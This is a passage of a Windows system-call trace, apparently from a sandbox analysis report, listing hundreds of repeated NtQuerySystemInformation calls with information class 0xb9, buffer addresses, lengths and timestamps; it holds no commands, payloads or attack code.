NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca08, Length=0x58, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0273.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0273.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0273.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0273.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x20, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0273.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.343] NtQuerySystemInformation 